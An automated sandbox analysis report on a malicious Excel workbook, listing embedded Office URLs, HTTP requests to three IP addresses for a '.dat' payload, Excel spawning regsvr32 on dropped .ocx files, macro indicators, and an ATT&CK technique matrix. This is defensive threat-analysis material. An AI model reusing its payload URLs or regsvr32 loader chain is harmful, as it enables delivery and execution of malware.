    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://invites.office.com/
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://lifecycle.office.com
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://login.windows.local
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://management.azure.com
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://management.azure.com/
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://messaging.office.com/
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://ncus.contentsync.
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://officeapps.live.com
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://onedrive.live.com
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://osi.office.net
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://otelrules.azureedge.net
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://outlook.office.com
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://outlook.office.com/
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://outlook.office365.com
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://outlook.office365.com/
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://pages.store.office.com/review/query
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://roaming.edog.
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://settings.outlook.com
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://staging.cortana.ai
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://tasks.office.com
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://wus2.contentsync.
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: FCEFC64E-A4ED-4957-8E69-56519943E108.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: global trafficHTTP traffic detected: GET /5679372910751440.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.141.26.236Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /5679372910751440.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.252.215.41Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /5679372910751440.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 188.165.62.32Connection: Keep-Alive

    System Summary

    barindex
    Source: Screenshot number: 8Screenshot OCR: Enable Editing ) PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless y
    Source: Screenshot number: 8Screenshot OCR: Enable Content (D SECURITY WARNING Macros have been disabled. Enable Content om If you are using a
    Source: Document image extraction number: 0Screenshot OCR: Enable Editing CD PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless y
    Source: Document image extraction number: 0Screenshot OCR: Enable Content CD SECURITY WARNING Macros have been disabled. Enable Content om If you are using a
    Source: Document image extraction number: 1Screenshot OCR: Enable Editing 1 PROTECTED VIEW Be careful . files from the Internet can contain viruses. Unless y
    Source: Document image extraction number: 1Screenshot OCR: Enable Content (D SECURITY WARNING Macros have been disabled. Enable Content Oj If you are using
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet: Vtreytr contains: urlmon
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet: Vtreytr contains: urlmon
    Source: Summary-313689350-Feb-15.xlsbInitial sample: EXEC
    Source: Summary-313689350-Feb-15.xlsbInitial sample: EXEC
    Source: Summary-313689350-Feb-15.xlsbInitial sample: EXEC
    Source: Summary-313689350-Feb-15.xlsbInitial sample: EXEC
    Source: Summary-313689350-Feb-15.xlsbInitial sample: EXEC
    Source: Summary-313689350-Feb-15.xlsbInitial sample: EXEC
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Tiposa1111
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Tiposa
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Tiposa3
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Tiposa6
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Detr
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Detr
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Tiposa2
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Vtreytr
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Vtreytr
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Xwtrd2
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Xwtrdferyy
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Tiposa11111
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Tiposa11111
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Xwtrd
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Xwtrd
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Tiposa3
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Tiposa1
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Tiposa
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Tiposa6
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Xwtrd2
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Tiposa2
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Xwtrdferyy
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Tiposa1
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Tiposa1111
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: 3ACDE726.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Hroser1.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Hroser2.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Hroser3.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Hroser1.ocxJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Hroser2.ocxJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Hroser3.ocxJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{FD932431-A020-442D-A60F-233BE2DFC117} - OProcSessId.datJump to behavior
    Source: classification engineClassification label: mal80.expl.evad.winXLSB@7/5@0/3
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Summary-313689350-Feb-15.xlsbInitial sample: OLE zip file path = xl/media/image1.png
    Source: Summary-313689350-Feb-15.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: Summary-313689350-Feb-15.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings4.bin
    Source: Summary-313689350-Feb-15.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings5.bin
    Source: Summary-313689350-Feb-15.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings6.bin
    Source: Summary-313689350-Feb-15.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings7.bin
    Source: Summary-313689350-Feb-15.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: 3ACDE726.tmp.0.drInitial sample: OLE indicators vbamacros = False
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: Yara matchFile source: app.xml, type: SAMPLE
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts2
    Scripting
    1
    DLL Side-Loading
    1
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    File and Directory Discovery
    Remote ServicesData from Local SystemExfiltration Over Other Network Medium2
    Non-Application Layer Protocol
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts22
    Exploitation for Client Execution
    Boot or Logon Initialization Scripts1
    DLL Side-Loading
    1
    Disable or Modify Tools
    LSASS Memory2
    System Information Discovery
    Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth12
    Application Layer Protocol
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
    Process Injection
    Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
    Ingress Tool Transfer
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
    Scripting
    NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://roaming.edog.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
    https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://api.aadrm.com0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    http://185.141.26.236/5679372910751440.dat100%Avira URL Cloudmalware
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    http://188.165.62.32/5679372910751440.dat0%Avira URL Cloudsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
    http://185.252.215.41/5679372910751440.dat100%Avira URL Cloudmalware
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://185.141.26.236/5679372910751440.dattrue
    • Avira URL Cloud: malware
    unknown
    http://188.165.62.32/5679372910751440.datfalse
    • Avira URL Cloud: safe
    unknown
    http://185.252.215.41/5679372910751440.dattrue
    • Avira URL Cloud: malware
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.comFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
      high
      https://login.microsoftonline.com/FCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
        high
        https://shell.suite.office.com:1443FCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
            high
            https://autodiscover-s.outlook.com/FCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
              high
              https://roaming.edog.FCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
              • URL Reputation: safe
              unknown
              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                high
                https://cdn.entity.FCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                • URL Reputation: safe
                unknown
                https://api.addins.omex.office.net/appinfo/queryFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                  high
                  https://clients.config.office.net/user/v1.0/tenantassociationkeyFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                    high
                    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/FCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                      high
                      https://powerlift.acompli.netFCEFC64E-A4ED-4957-8E69-56519943E108.0.drfalse
                      • URL Reputation: safe
